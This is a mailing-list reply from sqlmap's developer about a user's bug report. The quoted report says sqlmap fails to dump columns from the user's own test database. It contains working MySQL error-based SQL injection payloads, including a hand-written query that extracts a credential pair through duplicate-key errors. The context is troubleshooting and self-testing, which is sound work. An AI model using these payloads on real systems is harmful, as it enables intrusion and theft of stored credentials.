Re: [sqlmap-users] Can't extract rows or columns all of a sudden
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Can't extract rows or columns all of a sudden
|
From: Miroslav S. <mir...@gm...> - 2012-01-07 15:21:57
|
Hi Cats. Just tried on MySQL/Error test case and it appears ok. Could you please send exact command line(s) you've used (without target url)? Please, use --flush-session as part of the first run. Kind regards, Miroslav Stampar On Sat, Jan 7, 2012 at 1:06 AM, cats <du...@al...> wrote: > Hello! > > I was playing around with sqlmap at home, and I noticed all of a sudden > that I couldn't get it to extract any columns or rows all of a sudden. > Database names, current users, tables and such works fine, but > extracting any columns with --dump doesn't work, and thus not getting > any rows either. --columns seems to work though, although if I do that > first and then --dump, it still wont work. > > Here's some output from sqlmap: > > At revision 4654. > > [00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test' > on database 'testDB' > [00:47:11] [ERROR] unable to retrieve the number of columns for table > 'test' on database 'testDB' > [00:47:11] [ERROR] unable to retrieve the columns for any table on > database 'testDB' > [00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for > table 'test' on database 'testDB' > [00:47:13] [WARNING] the SQL query provided does not return any output > [00:47:13] [INFO] analyzing table dump for possible password hashes > Database: testDB > Table: test > [0 entries] > +----------+----------+ > | strTest1 | strTest2 | > +----------+----------+ > +----------+----------+ > > > The vulnerability used by sqlmap is the following error based one: > > --- > Place: GET > Parameter: q > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: q=2) AND (SELECT 2155 FROM(SELECT > COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE > 0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM > INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039 > --- > > And if I try to extract data manually through my browser, then it works > perfectly: > > Notice the extracted data: te...@ma...:aPassword > > Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key' > select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT > COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557) > THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test > GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 = > 2) AND (SELECT 2557 FROM(SELECT > COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1 > ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY > x)a) AND (8882=8882) > > PS: I tried specifying with "-C strTest1,strTest2" as well > > Any ideas? :-) > > Thanks in advance, and thanks for a great tool (helps me a lot in my > work, and saves me time from having to write my own scripts all the time > to test my software)! > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
